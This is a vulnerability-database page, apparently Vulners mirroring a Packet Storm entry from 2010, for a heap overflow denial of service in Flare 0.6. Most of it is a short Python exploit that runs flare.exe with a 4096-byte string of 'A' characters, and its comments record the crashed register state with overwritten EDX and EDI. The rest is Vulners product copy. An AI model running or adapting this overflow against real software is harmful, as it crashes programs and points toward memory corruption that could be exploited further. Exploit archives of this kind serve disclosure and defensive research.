Lucene search
K

Flare 0.6 Heap Overflow Denial Of Service

🗓️ 08 Mar 2010 00:00:00Reported by l3DType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Flare 0.6 Heap Overflow Denial Of Service, Python exploi

Code
`#!/usr/bin/env python  
#IRC: irc.nix.co.il<http://irc.nix.co.il>  
#Site: xraysecurity.blogspot.com<http://xraysecurity.blogspot.com> <---- Coming soon!  
  
#Registers:  
#EAX 003E0000  
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."  
#EDX 41414141  
#EBX 00004141  
#ESP 0022FB0C  
#EBP 0022FBDC  
#ESI 003E1080  
#EDI 41414141  
#EIP 77195B44 ntdll.77195B44  
  
import os, sys  
  
if len(sys.argv) != 1:  
path=sys.argv[1]  
else:  
path='flare.exe'  
  
if not os.path.exists(path):  
print 'Usage: python %s [path to flare.exe]' % sys.argv[0]  
exit(-1)  
  
os.execl(path, path, 'A'*0x1000)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation